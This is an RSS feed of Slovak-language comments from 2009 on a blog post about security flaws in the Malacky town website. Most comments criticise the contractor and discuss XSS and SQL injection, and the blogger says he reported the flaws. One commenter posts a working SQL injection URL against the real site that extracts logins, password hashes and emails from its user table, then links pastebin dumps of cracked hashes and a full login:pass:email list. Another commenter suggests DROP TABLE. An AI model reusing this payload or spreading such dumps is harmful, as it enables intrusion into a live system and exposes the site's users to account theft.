<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://blackhole.sk" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>BLACKHOLE.sk - Hacknite si malacky.sk... - Comments</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk</link>
 <description>Comments for &quot;Hacknite si malacky.sk...&quot;</description>
 <language>en</language>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23170</link>
 <description>&lt;p&gt;Ak by na úrade apoň niekto uvažoval hlavou a v rámci platnej legilatívy, určite by ich napadlo, že s novým webom im vzniká aj nový informačný systém a minimálne z pohľadu zákona o ochrane osobných údajov by mali bezpečnosť takéhoto systému riešiť.&lt;/p&gt;
</description>
 <pubDate>Sat, 11 Apr 2009 19:19:25 +0200</pubDate>
 <dc:creator>pa3k</dc:creator>
 <guid isPermaLink="false">comment 23170 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23169</link>
 <description>&lt;p&gt;Ide o to, ze na mestskom urade nikoho ani nenapadne, ze existuje daka moznost zneuzitia ich webu, takze pri preberani projektu to ani nik nekontroluje, resp. nikoho neziada o kontrolu. To co sa rata je design + ci to robi veci, ktore to robit ma. Otazky bezpecnosti sa riesia az potom, ked niekto dokresli na sajte primatorovi fuzy..&lt;/p&gt;
</description>
 <pubDate>Sat, 11 Apr 2009 19:02:27 +0200</pubDate>
 <dc:creator>durino13</dc:creator>
 <guid isPermaLink="false">comment 23169 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23167</link>
 <description>&lt;p&gt;Áno nejaké SQL injection som si neskôr tiež všimol, je to fakt smutné. Takýchto &quot;programátorov&quot; bez akýchkoľvek skúseností je žiaľ dnes plno. Vidím to ale hlavne ako chybu mesta, pretože hotovú zákazku by si pred ostrým nasadením mali dať preveriť, keď už nikto z pracovníkov mesta nevie posúdiť kvalitu a bezpečnosť diela, tak to mali dať zhodnotiť externe.&lt;/p&gt;
</description>
 <pubDate>Sat, 11 Apr 2009 18:40:48 +0200</pubDate>
 <dc:creator>pa3k</dc:creator>
 <guid isPermaLink="false">comment 23167 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23160</link>
 <description>&lt;p&gt;Tak dropovat nic nebudem ale ked tak,  tu su niake dumpy :&lt;/p&gt;
&lt;p&gt;Cracknute hashe (SHA1 ) (ba 33% zo 100% ) :&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://pastebin.ca/1388358&quot; title=&quot;http://pastebin.ca/1388358&quot;&gt;http://pastebin.ca/1388358&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Full dump vo formate login:pass:email&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://pastebin.ca/1388359&quot; title=&quot;http://pastebin.ca/1388359&quot;&gt;http://pastebin.ca/1388359&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Have Fun :D&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 23:31:23 +0200</pubDate>
 <dc:creator>SeXy</dc:creator>
 <guid isPermaLink="false">comment 23160 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23159</link>
 <description>&lt;p&gt;a čo takto DROP TABLE ? :)&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 23:12:21 +0200</pubDate>
 <dc:creator>pajon</dc:creator>
 <guid isPermaLink="false">comment 23159 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23158</link>
 <description>&lt;p&gt;http://www.malacky.sk/index.php?page=uradtab_archiv&amp;amp;id=-1%20union%20all%20select%201,2,concat(login,0x3a,heslo,0x3a,email),4,5,6%20from%20mlc_user--&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 22:52:45 +0200</pubDate>
 <dc:creator>SeXy</dc:creator>
 <guid isPermaLink="false">comment 23158 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23157</link>
 <description>&lt;p&gt;&lt;cite&gt;PPS: (EDIT) tak už vidím, že tam sú aj horšie diery ako si napísal... súhlasím v tom, že to vyzerá na odfláknutú robotu.&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;Ta sajta je derava jak emental. SQL injection na kazdom rohu.. Sa cudujem, ze sa autor toho webu nehanbi nazvat programator. Ja by som ho nenazval ani wannabe..&lt;br /&gt;
----------&lt;br /&gt;
&lt;strong&gt;&lt;a href=&quot;http://mariodian.wordpress.com&quot; title=&quot;Moj Blog&quot;&gt;tommyhot&lt;/a&gt;@hackingmachine:~$&lt;/strong&gt; &lt;em&gt;microsoft &amp;amp;&amp;gt; /dev/null&lt;/em&gt;&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 02:45:00 +0200</pubDate>
 <dc:creator>tommyhot</dc:creator>
 <guid isPermaLink="false">comment 23157 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23156</link>
 <description>&lt;p&gt;Aha, už chápem a aj ja držím malackému Billovy Gatesovy palce :-D&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 01:38:27 +0200</pubDate>
 <dc:creator>pa3k</dc:creator>
 <guid isPermaLink="false">comment 23156 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23154</link>
 <description>&lt;p&gt;&lt;cite&gt;Žiadny problém? Cez nepermanentné XSS napriamo asi ťažko. Alebo je tam aj iná zraniteľnosť?&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;no ja tam vidím perzistentné XSS, môžem sa mýliť :) aj ja sa len učím :)&lt;/p&gt;
&lt;p&gt;&lt;cite&gt; Free neznamená nič iné ako slobodný, s kvalitou kódu to môže mať spoločné pramálo.&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;s tým súhlasim, veď ja som nikde nepovedal že free = automaticky dobré a výborné, ja som len chcel poukázať na to, že napríklad Nuke, Joomla alebo drupal by to isto zvládol lepšie, a aj keď nie, tak isto za menší peniaz.&lt;/p&gt;
&lt;p&gt;&lt;cite&gt;PS: reportol si im to? Reagovali? Ako dlho trvala oprava?&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;reportol samozrejme, oprava trvá už od augusta minulého roka dlho pradlho kedy im &lt;a href=&quot;http://stv.livetv.sk/tvarchive//video/video.html?video=35332&quot;&gt;17 ročný autor&lt;/a&gt; (od 11:15) dodal neúplnú aplikáciu, čo potvrdilo aj &lt;a href=&quot;http://www.malacky.sk/index.php?page=clanok_cely&amp;amp;id=2040&quot;&gt;samo mesto&lt;/a&gt;, článkov na tému malacky.sk a oxide nájdeš na internete neúrekom, stačí počítať :)&lt;/p&gt;
&lt;p&gt;&lt;cite&gt;PPS: (EDIT) tak už vidím, že tam sú aj horšie diery ako si napísal... súhlasím v tom, že to vyzerá na odfláknutú robotu.&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;;)&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 00:47:34 +0200</pubDate>
 <dc:creator>snake</dc:creator>
 <guid isPermaLink="false">comment 23154 at http://blackhole.sk</guid>
</item>
<item>
 <title>Re: Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk#comment-23152</link>
 <description>&lt;p&gt;&lt;cite title=&quot;citácia&quot;&gt;Kradnúť maily? Cookies? Heslá? opäť žiadny problém. &lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;Žiadny problém? Cez nepermanentné XSS napriamo asi ťažko. Alebo je tam aj iná zraniteľnosť?&lt;/p&gt;
&lt;p&gt;&lt;cite title=&quot;citácia&quot;&gt;Dôvod prečo postujem tento článok je ten, že ma zaujalo, ako mesto Malacky dá peniaze (dosť veľké - pravda?) za projekt &lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;No neviem, mne to nepríde ako veľký peniaz a už vôbec nie za projekt podobného pozsahu. &lt;/p&gt;
&lt;p&gt;&lt;cite title=&quot;citácia&quot;&gt;bez akéhokoľvek zabezpečenia, &lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;Bez akéhokoľvek zabezpečenia? Napíš o tom niečo viac ak sa dá, lebo z toho čo si napísal to môže byť kľudne jedno zabudnuté htmlspecialchars a neošetrené magic_quotes. &lt;/p&gt;
&lt;p&gt;&lt;cite title=&quot;citácia&quot;&gt;namiesto toho aby použila free CMS riešenia, ktoré sú (väčšinou) bez takýchto veľkých a &quot;detských&quot; chýb.&lt;/cite&gt;&lt;/p&gt;
&lt;p&gt;:) Ehm, to by som už vôbec negeneralizoval. Free neznamená nič iné ako slobodný, s kvalitou kódu to môže mať spoločné pramálo. Napríklad taký Free a OpenSource &lt;a href=&quot;http://diskuse.jakpsatweb.cz/index.php?action=vthread&amp;amp;forum=6&amp;amp;topic=64014&quot;&gt;ZENcart&lt;/a&gt; - osobne moc nepoznám, názory adminov a hosterov v diskusii sú ale pekne pikantné a hovoria za všetko. Verím tomu, mám podobné skúsenosti s inými OpenSource projektami. &lt;/p&gt;
&lt;p&gt;PS: reportol si im to? Reagovali? Ako dlho trvala oprava?&lt;br /&gt;
PPS: (EDIT) tak už vidím, že tam sú aj horšie diery ako si napísal... súhlasím v tom, že to vyzerá na odfláknutú robotu.&lt;/p&gt;
</description>
 <pubDate>Fri, 10 Apr 2009 00:07:34 +0200</pubDate>
 <dc:creator>pa3k</dc:creator>
 <guid isPermaLink="false">comment 23152 at http://blackhole.sk</guid>
</item>
<item>
 <title>Hacknite si malacky.sk...</title>
 <link>http://blackhole.sk/hacknite-si-malacky-sk</link>
 <description>&lt;p&gt;Dnes si tak brúzdam sajtom Malaciek (malacky.sk), až narazím na spoločnosť, ktorá mala túto stránku na starosti - oxide.sk . Niekde som názov tejto firmy už počul, nespomenul som si avšak kde, tak som skúsil &lt;a&gt;Google&lt;/a&gt; a dostávam sa na stránku SME.sk, kde sa dozvedám, že portál malacky stál 88-tisíc slovenských korún (2921€).&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://blackhole.sk/hacknite-si-malacky-sk&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <comments>http://blackhole.sk/hacknite-si-malacky-sk#comments</comments>
 <pubDate>Thu, 09 Apr 2009 19:52:08 +0200</pubDate>
 <dc:creator>snake</dc:creator>
 <guid isPermaLink="false">3963 at http://blackhole.sk</guid>
</item>
</channel>
</rss>

